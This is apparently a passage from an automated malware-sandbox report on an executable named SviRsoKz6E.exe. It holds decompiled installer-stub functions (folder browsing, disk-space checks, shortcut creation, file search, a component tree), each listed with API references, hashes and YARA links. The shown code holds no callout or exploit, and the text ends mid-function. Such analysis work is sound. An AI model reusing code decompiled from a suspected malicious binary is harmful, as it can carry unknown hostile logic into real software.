				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004057C1(0x3fb, _t146);
							if(E00405B47(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E004060C1(0x41fcf8, _t146);
							_t87 = E004064CA(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004060C1(0x41fcf8, _t146);
								_t89 = E00405AF2(0x41fcf8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41fcf8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41fcf8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41fcf8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405AA0(0x41fcf8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41fcf8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404A6B(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x423efc; // 0x81b80f
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A53(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41fce8);
									} else {
										E0040498E(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x4247e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00404167(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420d18 == _t158) {
									E00404530();
								}
								 *0x420d18 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420d28;
							_v60 = E00404928;
							_v56 = _t146;
							_v68 = E00406154(_t146, 0x420d28, _t166, 0x420100, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405A59(_t146);
								_t125 =  *((intOrPtr*)( *0x424734 + 0x11c));
								if( *((intOrPtr*)( *0x424734 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00406154(_t146, 0x420d28, _t166, 0, _t125);
									if(lstrcmpiA(0x4236c0, 0x420d28) != 0) {
										lstrcatA(_t146, 0x4236c0);
									}
								}
								 *0x420d18 =  *0x420d18 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405AC6(_t146) != 0 && E00405AF2(_t146) == 0) {
						E00405A59(_t146);
					}
					 *0x423ef8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404145(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404145(_t166);
					E0040417A(_t165);
					_t138 = E004064CA(8);
					if(_t138 == 0) {
						L53:
						return E004041AC(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                  0x004045d7
                  0x004045dd
                  0x004045e3
                  0x004045f0
                  0x004045fe
                  0x00404601
                  0x00404609
                  0x0040460f
                  0x0040460f
                  0x0040461b
                  0x0040461e
                  0x0040468c
                  0x00404693
                  0x0040476a
                  0x00404771
                  0x00404780
                  0x00404780
                  0x00404784
                  0x0040478e
                  0x0040479b
                  0x0040479d
                  0x0040479d
                  0x004047ab
                  0x004047b2
                  0x004047b9
                  0x004047bc
                  0x004047f3
                  0x004047f5
                  0x004047fb
                  0x00404800
                  0x00404804
                  0x00404806
                  0x00404806
                  0x00404822
                  0x00000000
                  0x00404824
                  0x00404827
                  0x00404835
                  0x0040483b
                  0x0040483c
                  0x0040483f
                  0x00404842
                  0x00000000
                  0x00404842
                  0x004047be
                  0x004047c0
                  0x004047c4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004047c6
                  0x004047c6
                  0x004047d3
                  0x004047d8
                  0x00000000
                  0x00000000
                  0x004047dc
                  0x004047de
                  0x004047de
                  0x004047e6
                  0x004047e8
                  0x004047eb
                  0x004047ee
                  0x004047f1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004047f1
                  0x0040484e
                  0x00404858
                  0x0040485b
                  0x0040485e
                  0x00404865
                  0x00404865
                  0x00404867
                  0x00404867
                  0x0040486c
                  0x0040486e
                  0x00404876
                  0x0040487d
                  0x0040487f
                  0x0040488a
                  0x0040488a
                  0x0040487f
                  0x00404891
                  0x0040489a
                  0x004048a4
                  0x004048ac
                  0x004048c7
                  0x004048ae
                  0x004048b7
                  0x004048b7
                  0x004048ac
                  0x004048cc
                  0x004048d1
                  0x004048d6
                  0x004048df
                  0x004048df
                  0x004048e8
                  0x004048ea
                  0x004048ea
                  0x004048f6
                  0x004048fe
                  0x00404908
                  0x00404908
                  0x0040490d
                  0x00000000
                  0x0040490d
                  0x004047bc
                  0x00404773
                  0x0040477a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040477a
                  0x00404699
                  0x004046a2
                  0x004046bc
                  0x004046c1
                  0x004046cb
                  0x004046d2
                  0x004046de
                  0x004046e1
                  0x004046e4
                  0x004046eb
                  0x004046f3
                  0x004046f6
                  0x004046fa
                  0x00404701
                  0x00404709
                  0x00404763
                  0x0040470b
                  0x0040470c
                  0x00404713
                  0x0040471d
                  0x00404725
                  0x00404732
                  0x00404746
                  0x0040474a
                  0x0040474a
                  0x00404746
                  0x0040474f
                  0x0040475c
                  0x0040475c
                  0x00404709
                  0x00000000
                  0x004046c1
                  0x004046af
                  0x00000000
                  0x00000000
                  0x004046b5
                  0x00000000
                  0x00404620
                  0x0040462d
                  0x00404636
                  0x00404643
                  0x00404643
                  0x0040464a
                  0x00404650
                  0x00404659
                  0x0040465c
                  0x0040465f
                  0x00404667
                  0x0040466a
                  0x0040466d
                  0x00404673
                  0x0040467a
                  0x00404681
                  0x00404913
                  0x00404925
                  0x00404687
                  0x0040468a
                  0x00000000
                  0x0040468a
                  0x00404681

                  APIs
                  • GetDlgItem.USER32 ref: 00404626
                  • SetWindowTextA.USER32(00000000,?), ref: 00404650
                  • SHBrowseForFolderA.SHELL32(?,00420100,?), ref: 00404701
                  • CoTaskMemFree.OLE32(00000000), ref: 0040470C
                  • lstrcmpiA.KERNEL32(Mfkeoxlzmclr,00420D28,00000000,?,?), ref: 0040473E
                  • lstrcatA.KERNEL32(?,Mfkeoxlzmclr), ref: 0040474A
                  • SetDlgItemTextA.USER32 ref: 0040475C
                    • Part of subcall function 004057C1: GetDlgItemTextA.USER32 ref: 004057D4
                    • Part of subcall function 0040639C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SviRsoKz6E.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 004063F4
                    • Part of subcall function 0040639C: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406401
                    • Part of subcall function 0040639C: CharNextA.USER32(?,"C:\Users\user\Desktop\SviRsoKz6E.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406406
                    • Part of subcall function 0040639C: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406416
                  • GetDiskFreeSpaceA.KERNEL32(0041FCF8,?,?,0000040F,?,0041FCF8,0041FCF8,?,00000001,0041FCF8,?,?,000003FB,?), ref: 0040481A
                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404835
                    • Part of subcall function 0040498E: lstrlenA.KERNEL32(00420D28,00420D28,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048A9,000000DF,00000000,00000400,?), ref: 00404A2C
                    • Part of subcall function 0040498E: wsprintfA.USER32 ref: 00404A34
                    • Part of subcall function 0040498E: SetDlgItemTextA.USER32 ref: 00404A47
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                  • String ID: (B$A$C:\Users\user\AppData\Local\Temp$Mfkeoxlzmclr
                  • API String ID: 2624150263-2164161993
                  • Opcode ID: 355fae2fdc5b81749f0646e346823bb3f61dec23bbe7f7c311cc870142e1b552
                  • Instruction ID: 23887ea06715a98946f15fa8ab5ee03a9679ba0c83a6df36e4e3dfda0b9dc378
                  • Opcode Fuzzy Hash: 355fae2fdc5b81749f0646e346823bb3f61dec23bbe7f7c311cc870142e1b552
                  • Instruction Fuzzy Hash: C9A183B1900209ABDB11EFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E0040216B() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405AC6( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                  0x00402174
                  0x0040217e
                  0x00402188
                  0x00402195
                  0x004021a0
                  0x004021a3
                  0x004021bd
                  0x004021c3
                  0x004021c9
                  0x004021cc
                  0x004021d6
                  0x004021da
                  0x004021da
                  0x004021df
                  0x004021f0
                  0x004021f8
                  0x004022d4
                  0x004022d4
                  0x004022db
                  0x004021fe
                  0x004021fe
                  0x0040220d
                  0x00402211
                  0x00402214
                  0x0040221a
                  0x00402228
                  0x0040222b
                  0x0040222d
                  0x00402238
                  0x00402238
                  0x0040223d
                  0x0040223f
                  0x00402246
                  0x00402246
                  0x00402249
                  0x00402252
                  0x00402255
                  0x0040225a
                  0x0040225c
                  0x00402269
                  0x00402269
                  0x0040226c
                  0x00402278
                  0x0040227b
                  0x00402284
                  0x0040228a
                  0x00402291
                  0x004022aa
                  0x004022ac
                  0x004022ba
                  0x004022ba
                  0x004022aa
                  0x004022bd
                  0x004022c3
                  0x004022c3
                  0x004022c6
                  0x004022cc
                  0x004022d2
                  0x004022e7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004022d2
                  0x004022dd
                  0x00402a5d
                  0x00402a69

                  APIs
                  • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                  Strings
                  • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID: C:\Users\user\AppData\Local\Temp
                  • API String ID: 123533781-501415292
                  • Opcode ID: b310643681fa9cba3794e279dcc61ed4778adefa45a21dd0207e9f0972d22f6f
                  • Instruction ID: 1d5fc0eda79a0a672284adf98007a832727f4b93af1a8b9a4894ceaf33dc30f5
                  • Opcode Fuzzy Hash: b310643681fa9cba3794e279dcc61ed4778adefa45a21dd0207e9f0972d22f6f
                  • Instruction Fuzzy Hash: 45510471A00208AFCB00DFE4CA88A9D7BB6EF48314F2041BAF515EB2D1DA799981CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 39%
                  			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E0040601F(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E004060C1();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                  0x004027b9
                  0x004027cd
                  0x004027d8
                  0x004027d9
                  0x00402918
                  0x004027bb
                  0x004027bb
                  0x004027bd
                  0x004027bf
                  0x004027bf
                  0x00402a5d
                  0x00402a69

                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: FileFindFirst
                  • String ID:
                  • API String ID: 1974802433-0
                  • Opcode ID: 88b92a63b67db3c6ea186fc9624545be7e507cb46778454c336e293156349447
                  • Instruction ID: 13e9d4e2be50c596067d6900ef2af7155ed35788a2bbd6a4100e2a10f5e5ac7a
                  • Opcode Fuzzy Hash: 88b92a63b67db3c6ea186fc9624545be7e507cb46778454c336e293156349447
                  • Instruction Fuzzy Hash: 0AF0A771604110DFD710EB649949AEE77A8DF51314F20057BF112B20C2D7B889469B2A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A82644, Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.200598798.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                  • Instruction ID: b817028daaf2e55b77085c0fd2f7c0e3f7dce350b94f6c175b0eb01473a13804
                  • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                  • Instruction Fuzzy Hash: 8D010D78A11209EFCB41DF98C584EADBBF4FB08720F5185A5E814E7721E734AE509B40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A82394, Relevance: .0, Instructions: 10COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.200598798.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                  • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                  • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                  • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404B4A, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E00404B4A(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x424768;
				_v28 =  *0x424734 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42473d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404A98(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42473c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x420d0c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x420d20;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x420d0c = 0;
								 *0x420d20 = 0;
								 *0x4247a0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42473d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404B18();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x420d20;
									_t206 =  *0x424768;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42476c <= 0) {
										L86:
										if( *0x42472c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x423efc; // 0x81b80f
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404A53(0x3ff, 0xfffffffb, E00404A6B(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42476c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x420d20);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x4247a0 = _a4;
					_v20 = 2;
					 *0x420d20 = GlobalAlloc(0x40,  *0x42476c << 2);
					_t264 = LoadImageA( *0x424720, 0x6e, 0, 0, 0, 0);
					 *0x420d14 =  *0x420d14 | 0xffffffff;
					_v16 = _t264;
					 *0x420d1c = SetWindowLongA(_v8, 0xfffffffc, E0040515C);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x420d0c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x420d0c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
